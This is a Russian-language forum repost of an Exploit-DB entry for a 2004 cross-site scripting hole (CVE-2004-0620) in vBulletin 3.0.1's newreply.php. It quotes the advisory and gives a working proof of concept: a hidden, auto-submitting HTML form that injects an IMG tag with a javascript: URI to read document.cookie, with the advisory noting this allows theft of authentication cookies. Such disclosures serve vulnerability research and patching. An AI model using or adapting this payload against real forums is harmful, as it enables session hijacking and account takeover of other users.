Exploit vBulletin 3.0.1 - 'newreply.php?WYSIWYG_HTML' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24234
Проверка EDB
  1. Пройдено
Автор
CHENG PENG SU
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2004-0620
Дата публикации
2004-06-24
HTML:
source: https://www.securityfocus.com/bid/10602/info

VBulletin is reported prone to an HTML injection vulnerability. This issue affects the 'newreply.php' and 'newthread.php' scripts.

An attacker may exploit this issue by including hostile HTML and script code in fields that may be viewable by other users, potentially allowing for theft of cookie-based authentication credentials and other attacks.

This issue is reported to affect VBulletin version 3.0.1, however, it is likely that other versions are affected as well.

<form action="http://www.example.com/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
&lt;script&gt;
document.all.preview.click();
&lt;/script&gt;
 
Источник
www.exploit-db.com

Похожие темы